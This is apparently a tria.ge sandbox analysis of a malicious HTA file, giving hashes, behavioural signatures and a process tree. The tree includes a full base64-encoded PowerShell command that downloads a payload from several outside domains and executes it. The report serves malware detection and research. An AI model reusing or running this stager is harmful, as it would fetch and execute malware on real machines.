Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
77s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
20/04/2023, 01:14
Static task
static1
Behavioral task
behavioral1
Sample
Ojvpuwa.hta
Resource
win7-20230220-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
Ojvpuwa.hta
Resource
win10v2004-20230220-en
6 signatures
150 seconds
General
-
Target
Ojvpuwa.hta
-
Size
348KB
-
MD5
e99b6cfcb794606f20ec5d1abed23906
-
SHA1
7278ef13293d8eecfe4202362b0c3ec1ae8f8559
-
SHA256
4f598f13fd473b3e9364dce26b99495ae728eac9ca9e278bd76be41141757c03
-
SHA512
ef7421a36f13ce928cb5205be59db8f57061d9e9b14dabf8cd860742bbc5c141f570d807ce25d439d2f83b62a62f9f88f29733a406d1abb272006d66461b0da0
-
SSDEEP
6144:id3ndjrklqgqr5K0NJhI101WdQyPK3LwCDkpJUbbj9KctPCltrt8gd3ndjrkW:yOauMvDyeUOW
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1816 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1816 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 820 wrote to memory of 1816 820 mshta.exe 27 PID 820 wrote to memory of 1816 820 mshta.exe 27 PID 820 wrote to memory of 1816 820 mshta.exe 27 PID 820 wrote to memory of 1816 820 mshta.exe 27
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Ojvpuwa.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQAcABzAHkAYwBoAG8AcABvAG0AcABvAHMATgB1AG4AbgBlAGQAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwBnAHMAcwBjAG8AcgBwAG8AcgBhAHQAaQBvAG4AbAB0AGQALgBjAG8AbQAvAG8AawBTAGYAagAvAHcAUAB3AGkAYQBKAEIALABoAHQAdABwAHMAOgAvAC8AegBhAGkAbgBjAG8ALgBuAGUAdAAvAE8AZABPAFUALwBxAEkAVgBEAFIATgB5AEwAaABwACwAaAB0AHQAcABzADoALwAvAGMAaQB0AHkAdABlAGMAaAAtAHMAbwBsAHUAdABpAG8AbgBzAC4AYwBvAG0ALwA2AE0AaAAxAGsALwBCAGUAUABUAFcARwBPAEEALABoAHQAdABwAHMAOgAvAC8AbQByAGMAcgBpAHoAcQB1AG4AYQAuAGMAbwBtAC8ATAA3AGMAYwBOAC8AUwBEAFQAQwA2AEwAVgAsAGgAdAB0AHAAcwA6AC8ALwBuAGEAeQBhAGQAbwBmAG8AdQBuAGQAYQB0AGkAbwBuAC4AbwByAGcALwB3AFgAYQBLAG0ALwBHAEwANgBiADkAdQAwAHEARAByAE8ALABoAHQAdABwAHMAOgAvAC8AZQByAGcALQBlAGcALgBjAG8AbQAvAG8AYwBtAGIALwBrAHIARQBpAGYAUQBCACwAaAB0AHQAcABzADoALwAvAGMAYQByAGwAYQBkAHYAbwBnAGEAZABhAHQAcgBpAGIAdQB0AGEAcgBpAGEALgBjAG8AbQAvAHQAdgBuAHEAOQAvAEsAUQBNAGUAaABYAHIAdABGADcANABjACwAaAB0AHQAcABzADoALwAvAGgAbwB0AGUAbABsAG8AcwBtAGkAcgB0AG8AcwAuAGMAbwBtAC8AcwBqAG4ALwBQAFoASQA1AFUANABVAHoAMwBvAHoAMAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABpAG4AZgB1AG4AZQByAGEAbAAgAGkAbgAgACQAcABzAHkAYwBoAG8AcABvAG0AcABvAHMATgB1AG4AbgBlAGQAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAGkAbgBmAHUAbgBlAHIAYQBsACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA2ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABMAG8AZwBvAGQAYQBlAGQAYQBsAHkALgBtAGUAYwBoAGkAcgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEwAbwBnAG8AZABhAGUAZABhAGwAeQAuAG0AZQBjAGgAaQByACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBRAEEAUgBRAEIATgBBAEYAQQBBAFgAQQBCAE0AQQBHADgAQQBaAHcAQgB2AEEARwBRAEEAWQBRAEIAbABBAEcAUQBBAFkAUQBCAHMAQQBIAGsAQQBMAGcAQgB0AEEARwBVAEEAWQB3AEIAbwBBAEcAawBBAGMAZwBBAHMAQQBFADAAQQBiAHcAQgAwAEEARwBRAEEATwB3AEEAPQAiADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AfQA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816
-